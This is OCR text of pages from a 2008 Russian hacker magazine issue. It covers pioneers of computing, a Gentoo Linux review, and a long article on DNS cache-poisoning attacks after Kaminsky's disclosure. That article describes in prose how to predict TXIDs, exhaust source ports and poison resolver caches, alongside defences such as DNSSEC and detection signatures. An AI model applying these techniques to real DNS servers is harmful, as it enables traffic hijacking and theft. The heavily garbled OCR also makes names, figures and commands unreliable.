ния, то стоит отметить еще одно известней- 
шее детище американского информатика, 

— Ызр. Л исп стал вторым в истории высоко- 
уровневым языком программирования (пер- 
вым был Фортран); он использовался и по сей 
день используется в основном для разреше- 
ния сложных задач. Датой рождения Лиспа 



тать со многими ведущими мировыми инс- 
титутами и лабораториями. Тридцать один 
год он проработал в ЕТН — Швейцарском 
федеральном технологическом институте, в 
Цюрихе. Написал немало книг (часть из них 
издана и на русском) и получил множество 
наград, втом числе, премию Тьюринга и 
медаль Леонардо да Винчи. Лишьв 1999он 
вышел на заслуженную пенсию. Впрочем, 
это не мешает ему оставаться членом трех 
национальных академий — Эѵѵізз Аса бету 
оі^Епдіпеегіпд (Швейцария), П.5. Аса бе ту 
оі" Епдіпеегіпд (США) и ВегИп-ВгапбенЬигд 
Аса бе ту (Германия) — и известнейшим 
ученым, который очень любит опережать 
свое время. Дело в том, что многие идеи 
Вирта, высказанные и даже частично воп- 
лощенные им в 70-х годах, нашли широкое 
применение и возможности для реали- 
зации лишь в конце 90-х. Посмотрим, что 
будет дальше. 




был 1 958 год, а известность к нему пришла 
чуть позже. В 1 960 в журнале Соттипісабопз 
оі Ше АСМ вышла статья Маккарти с подроб- 
ным описанием нового языка. По большому 
счету, Джон стал отцом не только Лиспа, но и 
основоположником всего функционального 
программирования кактакового. 

Забавно, но он, похоже, успел поработать 
чуть ли не во всех самых престижныхучебных 
заведениях для гиков: в Принстонском и 
Стэндфордском университетах. 

Дартмутском колледже и Массачусетском тех- 
нологическом институте. Осесть Маккарти все 
же предпочел в Стэнфорде, где и оставался 
профессором вплоть до 2000 года (пора уже 
было на пенсию). 

Сегодня Джон носит звание заслуженного 
профессора и справедливо почиваетна 
лаврах. ^ 
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в ХРОНОЛОГИЯ СОБЫТИЙ 

Готовясь кочередной хакерской конференции Віаск Наі: иЗА 2008, Дэн 
Каминский, сотрудник компании ІОАсОѵе, подготовил доклад, демонст- 
рирующий новые атаки на ОМЗ-сервера. Что интересно, в презентации 
текст почти отсутствовал. Каминский отказывался разглашатьтехни- 
ческие детали, нагнетая атмосферуужаса и паники. Компании, специа- 
лизирующиеся на компьютерной безопасности, лихорадочноанализи- 
ровали заплатки, выпущенные производителями, пытаясь определить, 
что именно было исправлено. Каки следовало ожидать, Каминский не 
откопал ничего принципиально нового, хотя и извлекизтьмы кромешной 
ранее использованные, но малоизвестные молодому хакерскому поколе- 
нию атаки на 0М5. 



Междутем, на одном из блогов появилось достаточно полное описание 
предполагаемого сценария атаки, которое, по одной версии, было выбол- 
тано Каминским «по пьяни», подругой — независимо реконструировано 
хакеромХалваром Флейком на основеанонса презентации Каминского. 

В настоящий моментубраны и анонс, и текстФлейка, на месте которого 
красуется «джентльменское» извинение. Однако, как говорится, что в 
Сеть попало, то пропало, и описание атаки немедленно расползлось по 
десяткам сайтов, форумов, блогов и живыхжурналов. 

Аза две неделидо презентации на теФзрІоіГе появиласьпара свежень- 
ких ехрІоіГов, один из которых предназначен для атак на ВМЗ-сервера, 
другой — на рабочие станции. Анализ обоих (выполненный мной «подолгу 
службы»] не выявил ничего особенно нового. Подобныетрюки я использо- 
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вал и сам (не для реальных атак, а для реп-іезііпд’а, но что это меняет?) 
Самое интересное — реальные дыры (о которых Каминский не имел ни ма- 
лейшего представления) остались не заткнутыми. Я сходу предложил два 
сценария внедрения вуже пропатченные системы. Не придав им, впрочем, 
большого значения, поскольку ЕпсіеаѵогЗесигіІуІпс (где сейчас работаю) 
в основном занимается разработкой и лицензированием сигнатур для 
различных систем обнаружения вторжения, многие из которых не имеют 
даже пороговыхдатчиков. В рамках «чистых» сигнатур (без привлечения 
специальных модулей) описать атаку на 0М5 практически невозможно в 
силу природы самой атаки. Но мне все-таки удалось это сделать, после чего 
я связался с разработчиками осей и всех популярных реализаций 0М5- 
серверов на предмет: «так когда же будут готовы нормальные патчи?!» 

И воттут началось... Разработчики быстро въехали в ситуацию и попроси- 
ли меня отложить публикацию до тех пор, пока лекарство не будет готово. 
В смысле, английскую публикацию. За русскую никакого договора не 
было, так что читатели «Хакера» имеют возможность получить эксклюзив- 
ную информацию из первых рук. 

В ВОСХОД СОЛНЦА НАД САН-ФРАНЦИСКОр ИЛИ КАК ЭТО РАБОТАЕТ 

□ М5-протокол может работать какповерхТСР,таки поверх НОР, причем 
в 99% случаев используется именно НОР — как более быстрый, менее 
ресурсоемкий, но, втоже время, и менее защищенный. Чтобы послать 
подложный пакет, который будет воспринятжертвой как правильный, до- 
статочно угадать (подобрать) идентификатор последовательности (ТХЮ) 
и номер порта-отправителя (5Р#). На этом заканчивается первая фаза 
атаки и начинается вторая. 

В простейшем случае злоумышленник может отправить подложный 
□М5-ответ с подложным ІР-адресом некоторого узла, на который ло- 
мится жертва. Например, хорошая идея — навязать ложный ІР сервера 
обновлений и заманить жертву на хакерский узел, где лежат «хакнутые» 
заплатки, начиненные червями или прочей заразой. 

Сложность реализации атак подобного рода в том, что рабочие станции 
кэшируют ВМЗ-запросы. Болеетого, система не принимает ВМЗ-ответов, 
которые незапрашивались — хакер должен дождаться момента, когда 
жертва пошлет ВМЗ-запрос, и сгенерировать подложный ответ прежде, 
чем это сделает настоящий ВМЗ-сервер! На самом деле, обе проблемы 
имеютвесьма элегантное решение. ВМЗ-кэш обычно невелик, а потому, 
пославжертве НТМІ-письмо с кучей картинок, лежащих на внешнихсер- 
верах с разными доменными именами, хакер может вытеснить из кэша 



все старые записи. После чего последняя ссылка в письме, ведущая на 
сервер обновлений, гарантировано пошлет обозначенный запрос в Сеть. 
Предшествующая ей ссылка на ѴѴеЬ-сервер, подконтрольный хакеру, 
поде кажет точное время, когда следует начинать генерацию подложных 
пакетов. Если хотя бы один из них будет воспринят как правильный, в 
□ М5-КЭШ попадет «левый» адрес сервера с апдейтами, имеющий все 
шансы «дожить» до очередной сессии обновлений. 

Атака на ПМ5-сервер сулитеще большие перспективы. Допустим, 
мы отправляем серверу запрос на разрешение доменного имени ххх. 
аЬсботаіп.сопп . заведомо отсутствующего в его кэше, поскольку та кого 
имени вообще нет. Атакуемый ПМЗ-сервер обращается к вышестоящим 
серверам за помощью. Если хакер успеет возвратить подложный пакет 
быстрее всех, и этот пакет будет воспринятжертвой как правильный, ата- 
куемый ПМ5-сервер запомнитхакерский ІР.Теперьон будет на прав л ять 
ему все последующие доменные имена *.аЬсботаіп.сот для преобразо- 
вания их в ІР, считая его наиболее компетентным 0М5-сервером, лучше 
других разбирающимся в домене аЬсботаіп.сот .Ха кер одним махом за- 
хватывает целый домен со всеми поддоменнами! Именно этотеценарий 
и предложил Каминский для атак. 

На первый взгляд, ситуация близка ккритической, ведь захватывая домены 
один за другим, атакующий может манипулировать траекторией сетевого 
трафика по своемуусмотрению, воровать конфиденциальную информацию, 
троянизировать исполняемые файлы и вытворять кучу других фокусов. 
Однако при ближайшем рассмотрении все видится в ином свете. Сценарий 
Каминского известен со времен первой молодости интернет, и его эффек- 
тивность преувеличена. Чтобы захватитьдомен, нужно послать подложный 
□М5-пакет, угадав ТХЮ/5Р#, что в общем случаетребует посылки большого 
количества пакетов, легко засекаемых даже самой примитивной системой 
обнаружения вторжения. Во-вторых, информация о кредитках обычно 
передается через 55Е (соединение, заведомоустойчивое к перехвату), а ис- 
полняемые файлы (особенно системные) снабжены цифровыми подписями, 
которые не подделаешь. Даже в случаеуспешного исхода атаки возможнос- 
ти хакера весьма ограничены, особенноучитывая существование дополни- 
тельныхзащитных комплексов, техжеантивирусов, например. 

Н ОЧЕММОЛЧАТЗАПЛАТКИ 

Латать ВМЗ-сервера и ОМЗ-резолверы (входящие в состав всех операци- 
онных систем) начали задолго до «дыры» Каминского. Древние системы 
использовали инкрементный ТХЮ (увеличивающийся на единицу с 



ХАКЕР 09 /117/ 08 



► 095 






ш < 



ипіхоі<] 











КЕ 5 ЕАЯСН 



Тп Лѵ«ц л Ч^СіЬ-гіккі 



► , г» МіМ»і»*і Ьгві 

ці |,іііі іы I ггі-| г^ гг 4 Ѵоііи-ш т 



шп. ліпгні кьА Гм V ш Ьг ц рпр^л- 

г ЛТХ І^ДІ Ш Ьн ЕГШ. Мк |Ж^#ѴП 4шѵ ■ ВіЛ 3 

ѴГІ'(іі-і N рЛР>^9Ч1Ы^.1НКМ 

'Рт-і^'рш ' ■ ^ тш-т" 1‘^Зжінѵ Ь Р1Х 
4^-1 :ц •»■:■■ ?і.і‘ -- 



НОВОСТИ МИРА*МІХ И ОРЕМЗООРСЕ 
МАЖОРНЫЙ РЕЛИЗ ЯДРА ЫМУХ 

Послетрех месяцев разработки и всестороннего тес- 
тирования вышла новая стабильная версия ядра Ыпих 
- 2.6.26. Как обычно, большинство изменений связано 
с исправлением найденных ошибок и улучшением 
поддержки устройств. Из важных нововведений стоит 
отметить следующие. Технология виртуализации КѴМ 
портирована на архитектуры ІА64, 5390, РРС и теперь 
включаетбазовую поддержку пара-виртуализации. 
Добавлена поддержка управления питанием РСІ 
Ехргезз А5РМ (АсОѵе Зіаіе Ро\л/ег Мападетепі:). 
Исправлены ошибки в обработчиках АСРІ-вызовов. 
Улучшена работа с протоколом ІРѵб, предварительная 
поддержка возможностей стандарта 802.1 1з, свежеис- 
печенный видеодрайвер УѴС для веб- камер; улучшена 
поддержка ОРМ для видеокарт АТІ и Іпіеі; тестировщик 
памяти теппіезі: и отладчик кдбЬ включены в ядро, но- 
вый файл /ргос/РІО/тоипОпІо теперь показываетболее 
полную информацию о монтированиях. 

Апбгеѵ Маіѵееѵ [апбгизбоскйгеаі. хакер. ги] 



г 



Блог Каминского с ОМ5-чекером, предназначенным для «честной» проверіі^ 
О N 5 н а уя 3 в и м ость^ 





> Ііпкз 

ѵѵѵѵѵѵ.бохрага.сопп 
— блог Каминского 

с 0М5-чекером, ко- 
торый предназначен 
для «честной» (как 
пишет Каминский) 
проверки ОМ5 на 
,, уязвимость, но (как 
^ показываетісрбиппр) 
ведет нечестную 
игру. И вообще, Дэн 
проявляет большую 
активность, фикси- 
руемую сенсорами 
распределенной сети 
компании Епбеаѵог 
Зесигііу, что наводит 
на определенные 
размышления. 



каждым ОМ 5-запросом) и фиксированный порт источника, 
что делало ОМ5-атаки чрезвычайно простым занятием. Не 
нужно быть пророком, чтобы угадать заранее известную пару 
1 6-битных чисел, варьирующуюся в оченьузких пределах. 
После первой волны атак разработчики, почесав взатылке, 
написали несложную функцию, генерирующую ТХЮ на 
основе системных часов, значение которых удаленному 
атакующему неизвестно (во всяком случае, так принято 
считать). Однако это не сильно смутило хакеров (пионеров, 
пользующихся готовыми ехрІоіЕами, мы в расчетне берем). 
Во-первых, энтропия (то есть мера беспорядка) в этом случае 
намного ниже 16-бит. Младшие биты системных часов обыч- 
но представляют собой константу, посколькуаппаратный 
таймер не обеспечивает зада иного временного разреше- 
ния. Старшиеже биты обычнотакже представляют собой 
константу, и надостаточно коротком временном отрезке 
меняется только середина 16-битового поля ТХЮ. 

Во-вторых, посылая запросы ВМ5-серверу и получая от него 
пакеты, хакер «вытягивает» оттуда ТХЮ, которые в подав- 
ляющем большинстве случаев ложатся натривиальную 
прямую арифметической прогрессии с минимальным раз- 
бросом. Онтем меньше, чем ниже загруженность сервера и 
канала, связывающего его с атакующим. Атаки вспыхнули с 
новой силой. Разработчики плюнули и сделали то, что им по- 
лагалась сделать с самого начала — полную рандомизацию 
ТХЮ, что, кстати, проще сказать, чем запрограммировать. 
Ведь ТХЮ должны представлять собой уникальные иден- 
тификаторы и не повторяться дважды в течение короткого 
интервала времени. Алгоритмы, основанные на системных 
часах, обеспечиваюттакое распределение в силу «стрелы 
времени», а вот функции типа гапбО требуют специальной 
доработки «напильником». Реализация усложняется. 



повышая вероятность косяков, но... чего не сделаешь ради 
безопасности? 

Порт источника долго не хотели рандомизировать, оставляя 
его какпоследний бастион. Но 16-битное полеТХЮ даже 
при 100% рандомизации (недостижимой на практике) — не 
слишком-то хорошая защита, и для успешной атаки хакеру 
достаточно в среднем послать 1^\Ы1 = 32768 пакетов. Учи- 
тывая пропускные способности современных сетей, плюс 
наличие распределенных ботнетов, атака займетсчитанные 
минуты! Система обнаружения вторжений, конечно, среаги- 
рует, но противостоять атаке не сможет, так как неизвестно, 
с какого узла ботнета придет следующий подложный пакет 
(а вот если хакер не меняет своего ІР, то его легко заблоки- 
ровать). 

До Каминского большинство систем использовало простой 
инкрементный алгоритм (номер порта источника увеличи- 
вается на единицу до тех пор, пока не встретится первый 
свободный порт), но это касается исключительно рабочих 
станций с 0М5-резолверами. У ОМ5-серверов порт-источ- 
ника обычно фиксирован и поумолчанию равен 53, хотя 
разработчики ВІМО 8 и 9 заблаговременно предоставили 
опциональную возможность его рандомизации. Когда вла- 
дельцы других систем лихорадочно качают патчи, пользо- 
ватели последних версий ВІМО просто комментируют одну 
строчку в конфиге патеб.сопі (Крис имеет в виду директиву 
«диегу-зоигсе асісігезз * рогС 53 ;», предписыва- 
ющую серверу ВІМО использовать 53-тий порт в качестве 
порта для запросов, посылаемых через все локальные 
сетевые интерфейсы — Прим, ред.), продолжая пить пиво. 

А потом включаютее обратно, поскольку рандомный порт 
на сервере — не естьхорошо,таккаквозникаютпроблемы с 
брандмауэрами, трансляторами сетевых адресов и прочие 
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конфикты. 

Заплатки, выпущенные для предотвращения (читай: затруднения) 
атакна ОМЗ-сервера и рабочие станции, рандомизовали ТХЮ вместе 
с портом-источника и изменили политику кэширования ОМЗ-ответов. 
Казалосьбы:теперь мы, наконец, защищены. Какбы нетак! Существует, 
по меньшей мере, два сценария эффективных атак, которые пробивают 
полностью пропатченные ВІМО 9, ^^В^N5, атакже, частично, РоѵѵегВМЗ. 
И сейчас я их продемонстрирую. 



конечном счете, может привести котказу в обслуживании. Раньше 
такой проблемы не возникало, поскольку один и тотже порт использо- 
вался для всех ОМЗ-ответов, а теперь, с рандомизацией, ОМЗ может 
брать только свободные порты, количество которыхтает буквально на 
глазах. Псевдослучайная функция назначения порта превращается во 
вполне предсказуемую. От 1 2-ти обозначенных бит не остается и следа! 
А потому рандомизацией портов можно смело пренебречь, сфокусиро- 
вавшись на предсказании ТХІВ. 



г ЗАДЫХАЯСЬ от ЖАЖДЫ 

о к, порт источника рандомизирован и выбирается наугад из широкого 
пула (точные цифры варьируются от одной системы кдругой и в грубом 
приближении составляют 16384, то есть 12 бит, хотя тотже РоѵѵегВМЗ 
использует всего 1024 порта, что при большом количестве запросов 
ведет кбанальному ВоЗ’у). Допустим, что сервер (или рабочая станция) 
использует криптостойкую функцию рандомизации, угадать следующее 
значение которой невозможно. Означаетли это, что атакующему необхо- 
димо перебирать 16 бит ТХІВ вместе с 12 битами порта источника? 
Конечно, нет! Порты — расходные материалы, и они используется 
не только ВМЗ’ом, но и многими другими службами, реализован- 
ными поверх ВВР. Это позволяетатакующему вполне легальными 
средствами захватить большое количество портов, просто посылая 
пакеты соответствующим службам и ожидая от них ответа. Как раз при 
генерации ответа и происходит«заем» порта, освобождаемого только 
после завершения отправки исходящего пакета. Даже если на сервере 
нет никаких других ВВР-служб, атакующий просто обрушивает на ВМЗ 
шквал легальныхзапросов, опустошая пул доступных портов, что, в 



В ГАДАНИЕ НА КОФЕЙНОЙ ГУЩЕ СХРОНОМЕТРОМ В РУКАХ 

В идеале, для выбора ТХІ В следует использовать абсолютно крип- 
тостойкую функцию, генерирующую настоящий белый шум. Однако без 
привлечения специального оборудования осуществить подобную затею 
невозможно, не говоря уже отом, что к выбору ТХІВ предъявляются до- 
статочножесткиетребования — они не должны повторяться на коротком 
временном участке, иначе возникнет путаница, чей это пакет, и кому он 
адресован. 

РоѵѵегВМЗ использует достаточно качественные функции для генера- 
ции ТХІВ, и атака на него —тема отдельного разговора. Вообще говоря, 
РоѵѵегВМЗ и сам не знает, что использует, читая псевдослучайные числа 
из псевдоустройства /сіеѵ/игапсіопп, которое может выдавать, что угодно. 
Системную дату использует В^ВВМЗ, остальные же системы задействуют 
довольно простые и вполне предсказуемые алгоритмы — зная предыду- 
щие члены псевдослучайной последовательности, мы можем с высокой 
степенью вероятности вычислить следующие (вероятность тем выше, 
чем больше у нас членов). 

В случае ВМЗ-сервера никаких проблем у атакующего не возникает — он 
просто посылаетемулегитимныезапросы, получая ответы сТХІВ взаго- 
ловке. Зная алгоритм, используемый для рандомизации (а он известен с 
точностью до системы, версию которой определить нетакуж и сложно), 
хакеру остается всего лишь... Хм. Даже без всякой математики тривиаль- 
ный Ьгиіе-Іогсе (осуществляемый на локальной машине без обращения к 
серверу) находит возможные варианты быстрее, чем хакер пьет кофе. 

С рабочими станциями ситуация обстоит чуть-чуть сложнее. Ведь им ВМЗ- 
запросы не пошлешь и ОМЗ-ответов не словишь. Нам известен алгоритм, 
используемый для генерации ТХЮ, известно даже, что для его «затрав- 
ки» используется системныйтаймер, но вотзначение самого таймера... 
Прочитатьегоудаленно?Да без проблем! Прижелании можнообойтись 
даже без ^аѵа-скриптов. Ведьтотже самый таймер используется нетолько 
в ООР, но и вТСР (для генерации начального номера последовательнос- 
ти), а потому, если машина способна отправлять хоть какие-то пакеты во 
внешнюю сеть, то значениетаймера восстанавливается безтруда,а по 



ВІМВ и товарищи 

Основная причина популярности ВШВ’а — инертность мыпіления. 
В роли кэширующего рекурсивного ВЫ5-сервера ВІМО просто 
ужасен, и уже на Нерекурсивных запросов в секунду среднее время 
ответа возрастает сначала до сотен миллисекунд, постепенно уве- 
личиваясь до десятков секунд! Реально под такой нагрузкой живет 
только РоѵѵегВМЗ. В ІВВМ5 работает вполне устойчиво, однако в 
силу выбора нестойкого алгоритма рандомизации ломается чуть 
ли не влет (даже с последними установленными заплатками, выпу- 
щенными после Каминского) . 
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• Описанные в статье 
атаки эффективно 
действуют только на 

□ М5-сервера, посы- 
лающие рекурсивные 
запросы и прини- 
мающие ответы без 
авторизации и обрат- 
ного резолвинга 0М5. 
Огромное количество 
серверов отвечает 
этим условиям. 

•0М55ЕС-ЭТ0 

набор расширений 

□ N5, позволяющих 
аутентифицировать 
источникзонных 
данных и проверить 
их целостность, ис- 
пользуя шифрование 
с открытым ключом. 

• В межсерверном 
взаимодействии 
посредством спе- 
цификаций ТКЕУ и 
Т5І0 применяется 
симметричная схема 
шифрования. ТКЕУ 
предназначен для 
автоматического 
генерирования 
секретного ключа на 
двух ВМЗ-серверах. 
Сигнатурами Т5І6 
подписываются ВМ5- 
запросы и ответы на 
них. 

• В 1997 году Евгений 
Кашпурев отравил 
кэши крупных ВМ5- 
серверов, заставив 
их думать, что 
адресом для ѵѵѵѵѵѵ. 
іпіегпіс.сот является 
адрес ѴѴеЬ-сервера 
АКегМІС. 

• Если объем данных, 
отправленных одним 
ВМ5-сервером, 
превышает размер 
□М5-датаграммы, 

то соединение про- 
должается, но уже 
с использованием 
ТСР. 
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немууже вычисляется «затравка». 

Главным образом, это относится кВІМВ 9 и ^^В^N5, ис- 
пользующим некриптостойкие функции. Ро\л/егВМ5стоит 
особняком, однако поскольку он также подвержен захвату 
иВР-портов,то 1 6-битный ТХІ В, пусть он хоть 100 раз крип- 
тостойкий и ни разу не предсказуемый, — плохое средство 
защиты отхакеров. 

Н КАКОТЭТОГОЗАЩИЩАЮТСЯ 

Установка свежихзаплатокоднозначно не решает проблему, 
и угроза атаки слишком велика, чтобы позволить себе ее 
игнорировать. Мелкие І5Р и офисные сервера достаточно 
легко перевести на 0М5 оѵегТСР. Аеще естьТЗІО, позволяю- 
щий в пределах небольшой локальной сети организовывать 
безопасные взаимодействия серверов за счет использова- 
ния сигнатур транзакций, и 0М55ЕС, обеспечивающий про- 
верку подлинности серверов и целостности зонных данных. 
Всеэти решения работаютлишь на узлах с небольшой 
нагрузкой. В промышленных масштабахтакие варианты 
обсуждать глупо. И что остается? Самое простое — использо- 
вать Ро\л/егВМ5. Он действительно намного надежнее, да и 
работает быстрее стандартного ВІМВ 9. 

Также не помешаетустановить качественную Ю5/ЮР. Как 
она работает, зависит от реализации. Например, садится на 
интерфейс и ловит все входящие/исходящие ВМ5-пакеты, и 
если обнаруживает достаточно большое количество входя- 
щих ВМЗ-ответов, которым не соответствовали ВМЗ-запро- 
сы, — сразу поднимаеттревогу. Слабость такого решения в 
том, что «левые» пакеты могут сыпаться и без всякой атаки, 
а количество подложных ВМ5-ответов при целевой атаке 



много ниже порога чувствительности сенсора. Именнотак 
подавляющее большинство Ю5/ІР5 и работает. 

Более сложные системы защиты парсяттрафик на сетевом 
уровне, «выдергивают» оттуда ОМЗ-ответы и, обращаясь к 
корневым серверам через ТСР, определяют достоверность 
предоставленной информации. Решение, конечно, надеж- 
ное, но... пропускная способность при этом находится на 
уровне трубки от ниппеля. 

Мы с Алиской (замечательной девушкой из Епбеаѵог 
СесигКу) разработали скоростной потоковый алгоритм, 
реализуемый на основе чистого сигнатурного анализа 
проходящего трафика. Руководящая идея заключается в 
том, что нормальный ОМС-сервер не отвечает дважды в 
течение короткого времени, поскольку первый ответ будет 
скэширован, и второго запроса просто не последует. А вот 
хакер, пусть и располагающий определенной информацией 
оТХЮ/БР#, вынужден посылать намного больше одного 
□ М5-ответа, содержа ще го тотже самый отрезолвенный ІР, 

— явный симптом атаки. 

Н ДЫРЫ ЕЩЕ БУДУТ 

Сейчас, когда пишутся эти строки, разработчики 0М5- 
серверов и операционныхсистем совместное компанией 
ЕпбеаѵогСесигіІу разрабатывают стратегический план 
ликвидации обнаруженных мной дыр. Кмоменту выхода 
журнала из печати лекарство (в виде очередной порции све- 
жих заплаток) уже появится в аптеках. Но не стоит отчаивать- 
ся (или обольщаться). Это не первая и далеко не последняя 
дыра в ОМЭ.Такчто — время покажет. 
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ЮРИЙ «ВОВЕВ» РАЗЗОРЕНОВ 



Самый быстрый 



Оепііоо Ьіпих завоевал 



ИЮ экстремального решения, которое может 



ібраться с внутренностями системы. Но за внешней хардкорностью скр^І 



ается очень удобный дистрибутив, который, попробовав один раз, уже не 



ахочется менять 



,6ЕЫТООСтиХ2008.0: новый РЕЛИЗ ПОПУЛЯРНОГО диет 
















в ПИНГВИННЕЛЮБИТНОВИЧКОВ 

Дженту появился на свет в начале 2002 года и, несмотря на свое про- 
хладное отношение к новичкам, практически сразу обрел популярность. 
Почему прохладное? В первых версиях вместо интуитивно понятной про- 
граммы установки предлагалась суровая командная строка и 20-странич- 
ный талмуд с описанием. Нужно было загрузиться с иѵеСО, распаковать 
архив, а затем поправить все конфигурационные файлы и самостоятельно 
собрать ядро. Да, — еще разметить диски, причесать /еСс/бзСаЬ, 
настроить локализацию. И все это вручную. Согласись, тут нужно обладать 
немалыми знаниями или стремиться ктаковым. Дистрибутив изначально 
был рассчитан на роѵѵегизегз. С другой стороны, после разборокс бепЬо 
человека не напугаешь мандрейком или, например, редхатом. 



Если для личного пользования система и могла быть приемлемой, то 
процесс развертывания Оепіоо в корпоративной среде на сотне компов 
представлялся струдом. Наверное, и сами разработчики поняли, что 
перемудрили, так как в августе 2005 года на суд общественности была 
представлена альфа-версия программы установки с графическим 
интерфейсом. Имидждистрибутива в глазах бывалых гентушников 
от нововведения практически не пострадал; любителям сложностей 
«традиционно экстремальный» путь был по-прежнему доступен. Но 
вот развернуть систему при помощи готовых бинарных пакетов стало 
проще и, главное, быстрее. В настоящее время версия Оепіоо Іпзіаііег 
достигла номера 0.6.6, и, судя по всему, планы по ее совершенствова- 
нию у разработчиков громадные. 
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Н ЧЕМ ХОРОШ СЕЫТОО 

Муки установки удалось полностью компенсировать за счетоптимиза- 
ции ядра, библиотек и программ под конкретное аппаратное обеспе- 
чение и задачи. В первую очередь, благодаря системе управления 
пакетами Рогіаде, которая заимствовала идею портов, принятую в 
В50-системах. В отличие от большинства дистрибутивов, пользо- 
ватель могсобрать полностью оптимизированную под конкретное 
оборудование систему еще на этапе установки. В бепіоо применяются 
флаги иВЕ, отвечающие за включение/выключение различных опций, 
которые обычно используются при конфигурировании командой 
. /сопбідиге во время стандартной сборки программы из исход- 
ников («--епаЫе/йізаЫе» или «--\л7ІСЬ./\л7ІСЬ.оиС»). Например, 
переменнаяиЗЕ="Х дСк дпоте -аіза" соответствует команде «. / 
сопбідиге --ѵ7ІСІі-х --ѵ/іСІі-дСк дпоте --ѵ^іСкоиС- 

аіза». иВЕ-флаги могутбыть глобальные, локальные и временные. Не- 
которые пакеты после установки также добавляютсвои значения в ЕІВЕ. 
Для сборки под конкретное оборудование используются флаги СНОВТ, 
СЕЕА6В, СХХЕЕА6В и НВЕ. Их настройка производится в файле /еСс/ 
таке .сопб. По умолчанию сборка происходит под архитектуру І686: 

# дгер СРЬАСЗ /еСс/таке . соп:Е 

СРЬАСЗ= " -тагск-686 -ріре" 

Именно ПОЛНЫЙ контроль над системой, начиная с первых шагов 
установки, привлекает пользователей кэтому, казалось бы, не самому 
удобному дистрибутиву. Здесь принято компилировать программы из 
исходных текстов, вместо того, чтобы устанавливать готовые пакеты. 
«Портеж» полностью берет на себя заботу о деталях. Достаточно указать 
имя программы, и она будет загружена, скомпилирована со всеми 
зависимостями и установлена. Выглядитэто не сложнее работы с АРТ 
в том же ПЬипШ, правда, несравненно дольше. За работу с портежами 
отвечаетспециальная утилита етегде. Обновление системы до послед- 
ней версии также просто и, фактически, выполняется одной командой 
«етегде -иаѵРЫ ѵ/огЮ». 

Возможности Рогіаде этим не ограничены. Например, технология слотов 
(5Е0Т) обеспечивает мирное сосуществование в системе нескольких 
версий одной программы. Использование механизма маскировки 
позволяетустанавливать какстабильные (поумолчанию), таки экспе- 
риментальные, но более свежие/функциональные версии программ. 

При этом сохраняется возможность отката на любую из старых версий. У 
некоторых пакетов в дереве портежей нет содержимого кактакового — в 
этом случае в бой вступают метапакеты. Например, пакет кбе полностью 
устанавливаетсреду КОЕ, привлекая различные КПЕ-пакеты в качестве 
зависимостей. 



Выбор ехіга пакетов при установке 

"^7 



Команда, при помощи которой производится синхронизация дерева 
портежей, выглядит следующим образом: 

# етегде --зупс 

Не будем скрывать, удистрибутива есть и очевидные недостатки. Среди 
ОСНОВНЫХ: необходимость в широком канале и мощном компьютере. Ком- 
пиляция всей системы и дополнительных пакетов займет немало времени. 
На сборку КОЕ в минимальной поставке на процессоре Р4 1 .6 Гцуйдетоко- 
ло двухдней. Крометого, нет каких-либо графических средств настройки. 
Для удобства предусмотрены три уровня оптимизации базовой 
системы: отзіадеі до зІадеЗ. Так, зіадеі предназначен для загрузки и 
дальнейшего построения всей системы с нуля; в зІадеЗ имеется напо- 
ловину готовая базовая система — а зІадеЗ содержит базовый Оепіоо. 
Сейчас поддержка предоставляется только при установке зіаде 3, и в 
основной документации описан именно этот вариант. Поэтому зіаде 1 и 
2 — уровни для знатоков. 

Компиляция и установка нового ядра, пугающая новичков даже своим 
названием, в Сепіоо можетбыть выполнена всего одной командой 
«депкегпеі --іпзСаІІ а11». Конечно, это будет нето ядро, ради ко- 
торого устанавливается бепіоо, но начинающим должно понравиться. 

В Сепіоо реализована поддержка прекомпилированных пакетов. Их 
роль, скорее, вспомогательная, однако полностью отказываться от 
них нельзя, так как некоторые программы распространяются исклю- 
чительно в бинарном виде. Хотя, использовав етегде с параметрами 
' --Ьиіісіркд ' или ' --Ьиіісіркдопіу ' , при необходимости можно 
собрать и пакет. 

Новичку освоить такой непростой дистрибутив без чтения мануалов прос- 
то нереально. И тут открывается еще один плюс ОепЬо — наличие очень 
подробной документации, ктомуже переведенной на несколько языков, 
втом числе и наш любимый русский. В бепіоо НапсіЬоок [ ѵѵѵѵѵѵ.депіоо. 
огд/сІос/ги/бапсІЬоок ) ты найдешь ответы на все вопросы по установке 
в разных режимах, настройке дистрибутива, использованию системы 
портежей и т.д. Английская версия хэндбука есть на установочном ЕіѵеСВ. 
Также много полезной информации содержится в русскоязычном 
разделе Оепіоо ѵѵікі ( ги.депіоо-ѵѵікі.сот ). Рекомендуем изучить раздел 
по русификации установленного бепіоо. Кстати, в документации есть 
несколько советов для юзеров, сидящих на медленных каналах. Если 
воспользоваться утилитой Оеііир [ РеКа Урсіаіе. сІеиир.зЕпеІ: ). — это 
позволит сэкономить почти 90%трафика за счеттого, что загружается 
не весь архив с исходными кодами, а только разность между новой 
и старой версией (применяется принцип, заложенный в сііі'і'/раісб). 
Правда, тулза не лишена недостатков, в частности, не поддерживается 
докачка пакетов. 






новости МИРА и ОРЕЫБОУРСЕ 
ДРАЙВЕРА НОВЫЕ, ПРОБЛЕМЫ 
СТАРЫЕ 

АМО объявила о выпуске новых драйверов АТІ Саіаіузі: 
версии 8.49.7 для ОС Ыпих, обеспечивающих по 
сравнению с предыдущими драйверами до 33% выше 
производительность в ОрепОІ. Из новшеств отмечает- 
ся поддержка картсерии Кабеоп НО 4800 (4850 и 4870), 
официальная поддержка релизов ОЬипШ 8.04 и 5и5Е 
Ыпих Епіегргізе Оезкіор 105Р2, атакже начальная 
поддержка 0реп5и5Е 1 1 .0. Несмотря на многочислен- 
ные багофиксы, в новой версии до сих пор остаются 
неисправленными 13 известных проблем. Среди них 
— порча изображения на экране при перетаскивании 




> СІѴСІ 

На прилагаемом 
кжурналу диске ты 
найдешь Сепіоо 
Еіпих 2008.0 для 
архитектуры х86. 




> Ііпкз 

• Ссвоитьтакой не- 
простой дистрибутив, 
какСепІоо, поможет 
Оепіоо НапсіЬоок 

— ѵѵѵѵѵѵ.депіоо.огд/ 
бос/ги/бапбЬоок . 

• Сообщество русско- 
язычных пользовате- 
лей Сепіоо Еіпих раз- 
местилось по адресу 
ѵѵѵѵѵѵ.депіоо.ги . 

• В русскоязычном 
разделе Оепіоо ѵѵікі 

[ гц.депіоо-ѵѵікі.сопп і 
содержится много по- 
лезной информации 
по настройкам. 

• Ближайшее зер- 
кало для загруз- 
ки находится по 
адресу тіггог.ѵапбех. 
ги/депіоо-бізиііез . 

• Кроме официаль- 
ных зеркал, дистри- 
бутив можно скачать 
и сторрент-трекера 
